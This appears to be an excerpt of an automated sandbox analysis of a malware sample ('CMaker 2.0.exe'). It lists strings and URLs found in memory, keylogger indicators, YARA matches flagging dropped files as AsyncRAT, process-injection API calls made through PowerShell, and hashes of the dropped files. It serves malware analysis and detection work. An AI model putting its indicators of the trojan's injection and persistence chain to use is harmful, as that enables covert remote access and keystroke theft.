                        Source: CMaker 2.0.exe, 00000005.00000003.2231837202.0000022D32CFB000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2231595262.0000022D32CDB000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2166652116.0000022D34A41000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2229517767.0000022D32CAD000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000002.2256023136.0000022D32D03000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2168838865.0000022D32CDD000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2231466391.0000022D32CBE000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2228604292.0000022D32CA8000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2168404462.0000022D32CF5000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2230940040.0000022D32CBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
                        Source: CMaker 2.0.exe, 00000005.00000003.2176043917.0000022D34D3E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2175447442.0000022D34D3E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000002.2257904597.0000022D34F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963
                        Source: CMaker 2.0.exe, 00000005.00000003.2229209676.0000022D34CA0000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2175447442.0000022D34C9B000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2230284618.0000022D34CA1000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2236209518.0000022D34CCA000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2228810788.0000022D34C9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.
                        Source: CMaker 2.0.exe, 00000005.00000002.2259985977.0000022D35440000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2920
                        Source: powershell.exe, 00000009.00000002.2322203406.000001DE65B61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                        Source: CMaker 2.0.exe, 00000005.00000003.2229209676.0000022D34CA0000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2234484698.0000022D3510F000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2176150111.0000022D34D09000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2175447442.0000022D34C9B000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2230284618.0000022D34CA1000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2222507577.0000022D34D0B000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2230378371.0000022D3510B000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2225418813.0000022D35112000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2232092321.0000022D3512C000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2230552371.0000022D3512A000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000002.2258311843.0000022D3512C000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2229249581.0000022D35113000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2228996872.0000022D3510A000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2241420000.0000022D3512C000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2175447442.0000022D34CFC000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2177316292.0000022D34CFC000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2217334699.0000022D34CFC000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2228810788.0000022D34C9B000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2231985007.0000022D3510B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/
                        Source: CMaker 2.0.exe, 00000005.00000003.2234484698.0000022D3510F000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2230378371.0000022D3510B000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2225418813.0000022D35112000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2232092321.0000022D3512C000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2230552371.0000022D3512A000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000002.2258311843.0000022D3512C000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2229249581.0000022D35113000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2228996872.0000022D3510A000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2241420000.0000022D3512C000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2231985007.0000022D3510B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/mail
                        Source: CMaker 2.0.exe, 00000005.00000003.2226687778.0000022D34D3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/mail/
                        Source: CMaker 2.0.exe, 00000005.00000003.2236745632.0000022D3511A000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2235901108.0000022D3511A000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2225418813.0000022D35112000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2234607655.0000022D35118000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2229249581.0000022D35113000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/
                        Source: CMaker 2.0.exe, 00000005.00000003.2228810788.0000022D34C9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/
                        Source: CMaker 2.0.exe, 00000005.00000003.2225582122.0000022D351CE000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2228425828.0000022D35248000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2226687778.0000022D34DB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/get
                        Source: CMaker 2.0.exe, 00000005.00000003.2171930276.0000022D34D0C000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2172590680.0000022D34D0C000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2176150111.0000022D34D09000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2226687778.0000022D34D1A000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2222507577.0000022D34D0B000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2169942092.0000022D34D0C000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2170682485.0000022D34D0C000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2175447442.0000022D34CFC000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2171387062.0000022D34D0C000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2177316292.0000022D34CFC000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2172993769.0000022D34D0C000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2217334699.0000022D34CFC000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2170407561.0000022D34D17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/post
                        Source: CMaker 2.0.exe, 00000002.00000003.2156737059.00000218C0180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.shields.io/pypi/v/cryptography.svg
                        Source: CMaker 2.0.exe, 00000005.00000002.2260232738.0000022D3568C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://importlib-resources.readthedocs.io/en/latest/using.html#migrating-from-legacy
                        Source: CMaker 2.0.exe, 00000005.00000003.2231103270.0000022D350EE000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000002.2257252361.0000022D34D4E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2226687778.0000022D34D3E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2231985007.0000022D3510B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://json.org
                        Source: CMaker 2.0.exe, 00000005.00000003.2176753865.0000022D34D66000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2217334699.0000022D34D3E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2176670133.0000022D351CE000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2229450636.0000022D34D66000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2177316292.0000022D34D64000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2226687778.0000022D34D3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mahler:8092/site-updates.py
                        Source: CMaker 2.0.exe, 00000002.00000003.2156737059.00000218C0180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mail.python.org/mailman/listinfo/cryptography-dev
                        Source: powershell.exe, 00000009.00000002.2359290982.000001DE7469F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                        Source: CMaker 2.0.exe, 00000005.00000002.2256796014.0000022D34B40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://peps.python.org/pep-0205/
                        Source: CMaker 2.0.exe, 00000005.00000002.2262592946.00007FFD8FB3B000.00000040.00000001.01000000.00000009.sdmpString found in binary or memory: https://peps.python.org/pep-0263/
                        Source: CMaker 2.0.exe, 00000002.00000003.2156737059.00000218C0180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pypi.org/project/cryptography/
                        Source: CMaker 2.0.exe, 00000002.00000003.2156737059.00000218C0180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://readthedocs.org/projects/cryptography/badge/?version=latest
                        Source: CMaker 2.0.exe, 00000005.00000002.2256796014.0000022D34B40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://rentry.co
                        Source: CMaker 2.0.exe, 00000005.00000002.2256796014.0000022D34B40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://rentry.co/
Source: CMaker 2.0.exe, 00000005.00000003.2171930276.0000022D34D0C000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2172590680.0000022D34D0C000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000002.2260232738.0000022D3568C000.00000004.00001000.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2176150111.0000022D34D09000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2226687778.0000022D34D1A000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2222507577.0000022D34D0B000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2169942092.0000022D34D0C000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2170682485.0000022D34D0C000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2175447442.0000022D34CFC000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2171387062.0000022D34D0C000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2177316292.0000022D34CFC000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2172993769.0000022D34D0C000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2217334699.0000022D34CFC000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2170407561.0000022D34D17000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://requests.readthedocs.io
Source: CMaker 2.0.exe, 00000005.00000002.2260232738.0000022D3568C000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://requests.readthedocs.ioP
Source: CMaker 2.0.exe, 00000005.00000003.2239700913.0000022D34AAD000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2234513191.0000022D34AA1000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2239428918.0000022D34AAC000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2232148885.0000022D34A94000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2239829401.0000022D34AAF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://tools.ietf.org/html/rfc2388#section-4.4
Source: CMaker 2.0.exe, 00000005.00000003.2176104183.0000022D35156000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2229209676.0000022D34CA0000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2176150111.0000022D34D09000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2175447442.0000022D34C9B000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2230284618.0000022D34CA1000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2222507577.0000022D34D0B000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2175447442.0000022D34CFC000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2177316292.0000022D34CFC000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2217334699.0000022D34CFC000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2228810788.0000022D34C9B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://twitter.com/
Source: CMaker 2.0.exe, 00000005.00000003.2175447442.0000022D34C9B000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000002.2260123822.0000022D35540000.00000004.00001000.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2175447442.0000022D34CFC000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2177316292.0000022D34CDD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy
Source: CMaker 2.0.exe, 00000005.00000002.2260123822.0000022D35540000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings
Source: CMaker 2.0.exe, 00000002.00000003.2156227950.00000218C0180000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.apache.org/licenses/
Source: CMaker 2.0.exe, 00000002.00000003.2156350024.00000218C018E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2156227950.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2156227950.00000218C018E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.apache.org/licenses/LICENSE-2.0
Source: CMaker 2.0.exe, 00000002.00000003.2158194630.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000002.2262533228.00007FFD8F789000.00000004.00000001.01000000.00000011.sdmp, CMaker 2.0.exe, 00000005.00000002.2264772265.00007FFD93668000.00000004.00000001.01000000.00000012.sdmp | String found in binary or memory: https://www.openssl.org/H
Source: CMaker 2.0.exe, 00000005.00000003.2171930276.0000022D34D0C000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2172590680.0000022D34D0C000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2176150111.0000022D34D09000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2226687778.0000022D34D1A000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2222507577.0000022D34D0B000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2169942092.0000022D34D0C000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2170682485.0000022D34D0C000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2175447442.0000022D34CFC000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2171387062.0000022D34D0C000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2177316292.0000022D34CFC000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2172993769.0000022D34D0C000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2217334699.0000022D34CFC000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2170407561.0000022D34D17000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.python.org
Source: CMaker 2.0.exe, 00000005.00000003.2176753865.0000022D34D66000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2217334699.0000022D34D3E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2176670133.0000022D351CE000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2229450636.0000022D34D66000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2177316292.0000022D34D64000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2226687778.0000022D34D3E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.python.org/
Source: CMaker 2.0.exe, 00000005.00000002.2256074496.0000022D34600000.00000004.00001000.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2168528887.0000022D34B16000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.python.org/download/releases/2.3/mro/.
Source: CMaker 2.0.exe, CMaker 2.0.exe, 00000005.00000002.2262592946.00007FFD8FBD8000.00000040.00000001.01000000.00000009.sdmp | String found in binary or memory: https://www.python.org/psf/license/
Source: CMaker 2.0.exe, 00000005.00000003.2226376831.0000022D352E3000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2220128984.0000022D35221000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2225808722.0000022D352C9000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2225314134.0000022D35274000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2228360030.0000022D35308000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2227580018.0000022D352F0000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2227398633.0000022D352E6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://wwww.certigna.fr/autorites/
Source: CMaker 2.0.exe, 00000005.00000003.2226376831.0000022D352E3000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2227665818.0000022D3531F000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2220128984.0000022D35221000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2225808722.0000022D352C9000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2225314134.0000022D35274000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2226979229.0000022D3531E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://wwww.certigna.fr/autorites/0m
Source: CMaker 2.0.exe, 00000005.00000003.2234484698.0000022D3510F000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2230378371.0000022D3510B000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2225418813.0000022D35112000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2232092321.0000022D3512C000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2230552371.0000022D3512A000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000002.2258311843.0000022D3512C000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2229249581.0000022D35113000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2228996872.0000022D3510A000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2241420000.0000022D3512C000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2231985007.0000022D3510B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://yahoo.com/
Source: unknown | Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49713

                        Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: DeadROOTkit.exe.4.dr, XLogger.cs | .Net Code: KeyboardLayout
Source: 4.2.1.exe.2ff5330.2.raw.unpack, XLogger.cs | .Net Code: KeyboardLayout

                        System Summary

Source: 7.0.DeadROOTkit.exe.dd0000.0.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT, Author: ditekSHen
Source: 4.2.1.exe.2ff5330.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT, Author: ditekSHen
Source: 6.0.DeadXClient.exe.c60000.0.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT, Author: ditekSHen
Source: 4.2.1.exe.2ff5330.2.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT, Author: ditekSHen
Source: 00000006.00000000.2202434236.0000000000C62000.00000002.00000001.01000000.0000001A.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT, Author: ditekSHen
Source: 00000007.00000000.2203959868.0000000000DD2000.00000002.00000001.01000000.0000001B.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT, Author: ditekSHen
Source: 00000004.00000002.2208653873.0000000002FE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT, Author: ditekSHen
Source: 00000004.00000002.2208653873.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT, Author: ditekSHen
Source: C:\Users\Public\DeadROOTkit.exe, type: DROPPED | Matched rule: Detects AsyncRAT, Author: ditekSHen
Source: C:\Users\Public\Deadsvchost.exe, type: DROPPED | Matched rule: Detects AsyncRAT, Author: ditekSHen
Source: C:\Users\Public\DeadXClient.exe, type: DROPPED | Matched rule: Detects AsyncRAT, Author: ditekSHen
Source: 1.exe.0.dr, -Program-.cs | Long String: Length: 253952
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 9_2_00007FFD344F0C6D NtWriteVirtualMemory
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 9_2_00007FFD344F0A4E NtUnmapViewOfSection
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 9_2_00007FFD344F0F30 NtSetContextThread
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 9_2_00007FFD344F0FF4 NtResumeThread
Source: C:\Windows\System32\wbem\WMIADAP.exe | File created: C:\Windows\system32\wbem\Performance\WmiApRpl_new.h
Source: C:\Windows\System32\wbem\WMIADAP.exe | File created: C:\Windows\system32\wbem\Performance\WmiApRpl_new.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File deleted: C:\Windows\Temp\__PSScriptPolicyTest_tldlbnvr.cn1.ps1
Source: Joe Sandbox View | Dropped File: C:\Users\Public\DeadCodeRootKit.exe 18294EE5A6383A48D1BCF2703F17D815529DF3A17580E027C3EFEA1800900E8F
Source: Joe Sandbox View | Dropped File: C:\Users\Public\DeadROOTkit.exe 5711B50667B4DE000C8031724427EC6CD00B41B760CA1608421DC47B549E2093
Source: Joe Sandbox View | Dropped File: C:\Users\Public\DeadXClient.exe 4353E37A3D60DD30BEEEC61A812A07BA6BFC174A18CDD5A95BE98666DB2F7CF6
                        Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 492 -p 4188 -ip 4188
                        Source: unicodedata.pyd.2.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                        Source: DeadCodeRootKit.exe.4.drStatic PE information: Resource name: EXE type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                        Source: python3.dll.2.drStatic PE information: No import functions for PE file found
                        Source: aoKTzGQSRP.exe, 00000000.00000002.2155452715.0000000003FF0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameM6JR1IT3F6.exe4 vs aoKTzGQSRP.exe
                        Source: aoKTzGQSRP.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                        Source: unknownProcess created: Commandline size = 5251
                        Source: 7.0.DeadROOTkit.exe.dd0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 4.2.1.exe.2ff5330.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 6.0.DeadXClient.exe.c60000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 4.2.1.exe.2ff5330.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 00000006.00000000.2202434236.0000000000C62000.00000002.00000001.01000000.0000001A.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 00000007.00000000.2203959868.0000000000DD2000.00000002.00000001.01000000.0000001B.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 00000004.00000002.2208653873.0000000002FE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 00000004.00000002.2208653873.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: C:\Users\Public\DeadROOTkit.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: C:\Users\Public\Deadsvchost.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: C:\Users\Public\DeadXClient.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: libcrypto-3.dll.2.drStatic PE information: Section: UPX1 ZLIB complexity 0.9989650991958289
                        Source: libssl-3.dll.2.drStatic PE information: Section: UPX1 ZLIB complexity 0.9923451741536459
                        Source: python311.dll.2.drStatic PE information: Section: UPX1 ZLIB complexity 0.9992887181541107
                        Source: unicodedata.pyd.2.drStatic PE information: Section: UPX1 ZLIB complexity 0.9942873714221825
                        Source: DeadXClient.exe.4.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
                        Source: DeadXClient.exe.4.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
                        Source: DeadXClient.exe.4.dr, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
                        Source: DeadROOTkit.exe.4.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
                        Source: DeadROOTkit.exe.4.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
                        Source: DeadROOTkit.exe.4.dr, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
